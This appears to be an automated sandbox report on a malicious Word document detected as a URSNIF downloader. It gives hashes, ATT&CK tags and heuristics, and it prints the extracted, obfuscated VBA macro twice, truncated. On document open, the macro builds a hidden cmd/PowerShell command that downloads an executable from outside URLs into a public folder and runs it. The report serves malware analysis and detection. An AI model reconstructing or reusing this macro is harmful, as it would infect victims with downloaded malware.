Office (OLE) malware analysis — malicious · d2ab7dfdf3b41c0a

MALICIOUS

Office (OLE)

72.4 KB Created: 2018-09-10 16:35:00 Authoring application: Microsoft Office Word First seen: 2019-01-12

MD5: 4eb91291df9b9c6acf05c9097b953a03 SHA-1: 8334ef25bd2b0ebb7a549109b983bac41f9f25c2 SHA-256: d2ab7dfdf3b41c0a6ed90b8f5dcfd366be8c953b931f4e46f1faba4b2d101a7d

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function. This indicates an attempt to execute arbitrary code. The macro appears to be constructing and executing a command, likely to download and run a secondary payload. The ClamAV detection as 'Doc.Downloader.URSNIF' further supports this behavior.

Heuristics 5

ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6037 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6037 bytes
SHA-256: `1050ae28c71c8e06cb953a2c2a56ecc752d86c4fdbdaa30162457a5a00c90ab0`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "OLzFVDQVooYNUH" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On _ Error _ Resume _ Next Second "ftpPXf" + "nW" + "1525" + "LisRbO" Second "HjYv" + "qpnuzhMUr" Second "528427961" + "129765028" + "412466689" + "omhw" Second "368720983" + "zakkKFJMU" + "kvTmkUb" + "433350859" Second "oKF" + "lcm" Second "Ic" + "Cjl" + "Hm" + "dBSMZnKovz" Shell KndCT + WVswzh + iWbKbwTP, CStr(vbHide) Second "163335906" + "mL" Second "SvbKwZQDQXt" + "DqNAovm" + "8121" + "OwIXwkDR" Second "3319" + "398096249" + "196439849" + "C" End Sub Attribute VB_Name = "JHJzBfUzpkp" Function KndCT() On _ Error _ Resume _ Next Second "9055" + "499963533" + "AatOXfv" + "172868664" UEjrTp = Format(Chr(9 + 13 + 1 + 2 + 74)) + "md /V/" + Format(Chr(6 + 9 + 1 + 1 + 50)) + Format(Chr(3 + 4 + 0 + 0 + 27)) + "^" + "se" + "^t " + "J" + "^dk=" + "^ ^" + " ^ ^" + " ^ ^ ^ " + " ^ " + "^ ^ ^}^" Second "kzXX" + "689" Second "524211872" + "RI" AsIDIniEIwk = "}^{" + "h" + Format(Chr(9 + 13 + 1 + 2 + 74)) + "^t^a" + Format(Chr(9 + 13 + 1 + 2 + 74)) + "^" + "};k^aer" + "b^" + ";" + "^h^tw$" + "^ m^e^t" + "^I-^e" + "k" Second "8465" + "slpQfGI" Second "kRMs" + "wzVWM" + "aDqN" + "172760407" MPjloLACXv = "^ov" + "n^" + "I^;)^ht" + "w^$ ," + "J^H" + "q^$(^el" + "^iF" + "da^oln" + "^wo" Second "PadikzPIo" + "w" + "83821022" + "89035000" Second "mLpDSki" + "DL" + "mESw" + "vcCl" iEbhFiQTCsH = "D^." + Format(Chr(9 + 13 + 1 + 2 + 74)) + "^dw^$" + "^{^" + "y" + "r^t^{)" + Format(Chr(6 + 9 + 1 + 1 + 50)) + "li$^ " + "ni^" + " ^JH^q" + "^$(h" + Format(Chr(9 + 13 + 1 + 2 + 74)) + "a" Second "JFhNdG" + "v" Second "328805307" + "nEP" + "9703" + "muiP" Second "411440498" + "9151" + "5341" + "4363" OzntjzOU = "^er^of;" + "'" + "ex" + "e^.^'" + "^+N^J" + "w$+^" + "'\'+" + Format(Chr(9 + 13 + 1 + 2 + 74)) + "ilb^" + "up^" + ":vne^$=" Second "sfjRSscvFP" + "sjzlWABv" + "YHROi" + "IhYWUjDb" Second "167851122" + "421503100" qVvwV = "h^t" + "w^" + "$^;^" + "'^" + "0^" + "9^9^'" + " " + "=^ " + "N^Jw^$" KndCT = UEjrTp + AsIDIniEIwk + MPjloLACXv + iEbhFiQTCsH + OzntjzOU + qVvwV Second "626" + "itELtTYQI" + "135191725" + "ODR" Second "oPTb" + "91" + "XJXhpJH" + "nR" Second "lO" + "306596480" + "3560" + "irju" Second "492120113" + "uOpEkkpoMf" End Function Function WVswzh() On _ Error _ Resume _ Next Second "vcrOKnfULEFu" + "AWHrHXmhk" Second "PVGaNzlmJwaLQw" + "ssQIc" + "156814207" + "Pz" Second "174375226" + "4235" Second "GbzEYSAGzQ" + "495351349" + "w" + "Pv" Second "wjYEpd" + "idEZSZamDMDUN" + "7031" + "427434602" WJWZG = ";)'^@'" + "(^ti" + "l^p" + "^S^.^'" + "^8Vo" + "^5M" + "a^" + "i" + "/m^o" + Format(Chr(9 + 13 + 1 + 2 + 74)) + "." + "oa" Second "Ri" + "9919" + "uc" + "M" Second "TXHUvoT" + "NOvLRQj" + "5138" + "XHYK" FjCApjNcoi = "^" + "lgn^ay" + "n^" + "a^" + "itgn^i" + "j//^:" + "^" + "p" + "^t^t" + "h@^" + "M" + "^A3lA" + "Ig/o" Second "RnEFtoWQJYqKCj" + "Ji" Second "171709023" + "QJtF" Second "iDsNHjzA" + "MjSzXPf" UhfkJwb = "f" + "ni.^l^a" + "^" + "ht" + "n" + "e" + "iram//:" Second "226395934" + "vorLnjlQtnXWcJ" Second "6930" + "91776214" Second "6352" + "jh" NiprKFMw = "^p" + "tth@^x" + "/" + "^" + "gro." + Format(Chr(9 + 13 + 1 + 2 + 74)) + "d" + Format(Chr(9 + 13 + 1 + 2 + 74)) + "^-" + Format(Chr(9 + 13 + 1 + 2 + 74)) + "b" + "//:p^" Second "330172040" + "S" Second "4831" + "c" + "piGOFzziF" + "pEuI" Second "397986967" + "24321295" Second "1756" + "nCBzGTMHfn" + "phXvfJUEFQI" + "MDMlB" Second "aK" + "KzKn" + "8131" + "212393181" tlLVfL = "tt" + "^h^@eR" + "^wK" + "E^3" + "^3/m" + "o" + Format(Chr(9 + 13 + 1 + 2 + 74)) + "^.^i" + "ka" + "it" + "^" + "o" + "/" + "/^:pt" Second "424" + "2313" Second "29540560" + "1916" + "523109150" + "q" mQpmCbr ... (truncated)

SHA-256: 1050ae28c71c8e06cb953a2c2a56ecc752d86c4fdbdaa30162457a5a00c90ab0

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "OLzFVDQVooYNUH"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
   Second "ftpPXf" + "nW" + "1525" + "LisRbO"
   Second "HjYv" + "qpnuzhMUr"
   Second "528427961" + "129765028" + "412466689" + "omhw"
   Second "368720983" + "zakkKFJMU" + "kvTmkUb" + "433350859"
   Second "oKF" + "lcm"
   Second "Ic" + "Cjl" + "Hm" + "dBSMZnKovz"
Shell KndCT + WVswzh + iWbKbwTP, CStr(vbHide)
   Second "163335906" + "mL"
   Second "SvbKwZQDQXt" + "DqNAovm" + "8121" + "OwIXwkDR"
   Second "3319" + "398096249" + "196439849" + "C"
End Sub



Attribute VB_Name = "JHJzBfUzpkp"
Function KndCT()

On _
Error _
Resume _
Next
Second "9055" + "499963533" + "AatOXfv" + "172868664"
UEjrTp = Format(Chr(9 + 13 + 1 + 2 + 74)) + "md /V/" + Format(Chr(6 + 9 + 1 + 1 + 50)) + Format(Chr(3 + 4 + 0 + 0 + 27)) + "^" + "se" + "^t " + "J" + "^dk=" + "^   ^" + "  ^ ^" + " ^ ^ ^ " + "    ^ " + "^ ^ ^}^"
Second "kzXX" + "689"
   Second "524211872" + "RI"
AsIDIniEIwk = "}^{" + "h" + Format(Chr(9 + 13 + 1 + 2 + 74)) + "^t^a" + Format(Chr(9 + 13 + 1 + 2 + 74)) + "^" + "};k^aer" + "b^" + ";" + "^h^tw$" + "^ m^e^t" + "^I-^e" + "k"
Second "8465" + "slpQfGI"
   Second "kRMs" + "wzVWM" + "aDqN" + "172760407"
MPjloLACXv = "^ov" + "n^" + "I^;)^ht" + "w^$ ," + "J^H" + "q^$(^el" + "^iF" + "da^oln" + "^wo"
Second "PadikzPIo" + "w" + "83821022" + "89035000"
   Second "mLpDSki" + "DL" + "mESw" + "vcCl"
iEbhFiQTCsH = "D^." + Format(Chr(9 + 13 + 1 + 2 + 74)) + "^dw^$" + "^{^" + "y" + "r^t^{)" + Format(Chr(6 + 9 + 1 + 1 + 50)) + "li$^ " + "ni^" + " ^JH^q" + "^$(h" + Format(Chr(9 + 13 + 1 + 2 + 74)) + "a"
Second "JFhNdG" + "v"
   Second "328805307" + "nEP" + "9703" + "muiP"
   Second "411440498" + "9151" + "5341" + "4363"
OzntjzOU = "^er^of;" + "'" + "ex" + "e^.^'" + "^+N^J" + "w$+^" + "'\'+" + Format(Chr(9 + 13 + 1 + 2 + 74)) + "ilb^" + "up^" + ":vne^$="
Second "sfjRSscvFP" + "sjzlWABv" + "YHROi" + "IhYWUjDb"
   Second "167851122" + "421503100"
qVvwV = "h^t" + "w^" + "$^;^" + "'^" + "0^" + "9^9^'" + " " + "=^ " + "N^Jw^$"
KndCT = UEjrTp + AsIDIniEIwk + MPjloLACXv + iEbhFiQTCsH + OzntjzOU + qVvwV
   Second "626" + "itELtTYQI" + "135191725" + "ODR"
   Second "oPTb" + "91" + "XJXhpJH" + "nR"
   Second "lO" + "306596480" + "3560" + "irju"
   Second "492120113" + "uOpEkkpoMf"
End Function
Function WVswzh()

On _
Error _
Resume _
Next
Second "vcrOKnfULEFu" + "AWHrHXmhk"
   Second "PVGaNzlmJwaLQw" + "ssQIc" + "156814207" + "Pz"
   Second "174375226" + "4235"
   Second "GbzEYSAGzQ" + "495351349" + "w" + "Pv"
   Second "wjYEpd" + "idEZSZamDMDUN" + "7031" + "427434602"
WJWZG = ";)'^@'" + "(^ti" + "l^p" + "^S^.^'" + "^8Vo" + "^5M" + "a^" + "i" + "/m^o" + Format(Chr(9 + 13 + 1 + 2 + 74)) + "." + "oa"
Second "Ri" + "9919" + "uc" + "M"
   Second "TXHUvoT" + "NOvLRQj" + "5138" + "XHYK"
FjCApjNcoi = "^" + "lgn^ay" + "n^" + "a^" + "itgn^i" + "j//^:" + "^" + "p" + "^t^t" + "h@^" + "M" + "^A3lA" + "Ig/o"
Second "RnEFtoWQJYqKCj" + "Ji"
   Second "171709023" + "QJtF"
   Second "iDsNHjzA" + "MjSzXPf"
UhfkJwb = "f" + "ni.^l^a" + "^" + "ht" + "n" + "e" + "iram//:"
Second "226395934" + "vorLnjlQtnXWcJ"
   Second "6930" + "91776214"
   Second "6352" + "jh"
NiprKFMw = "^p" + "tth@^x" + "/" + "^" + "gro." + Format(Chr(9 + 13 + 1 + 2 + 74)) + "d" + Format(Chr(9 + 13 + 1 + 2 + 74)) + "^-" + Format(Chr(9 + 13 + 1 + 2 + 74)) + "b" + "//:p^"
Second "330172040" + "S"
   Second "4831" + "c" + "piGOFzziF" + "pEuI"
   Second "397986967" + "24321295"
   Second "1756" + "nCBzGTMHfn" + "phXvfJUEFQI" + "MDMlB"
   Second "aK" + "KzKn" + "8131" + "212393181"
tlLVfL = "tt" + "^h^@eR" + "^wK" + "E^3" + "^3/m" + "o" + Format(Chr(9 + 13 + 1 + 2 + 74)) + "^.^i" + "ka" + "it" + "^" + "o" + "/" + "/^:pt"
Second "424" + "2313"
   Second "29540560" + "1916" + "523109150" + "q"
mQpmCbr
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.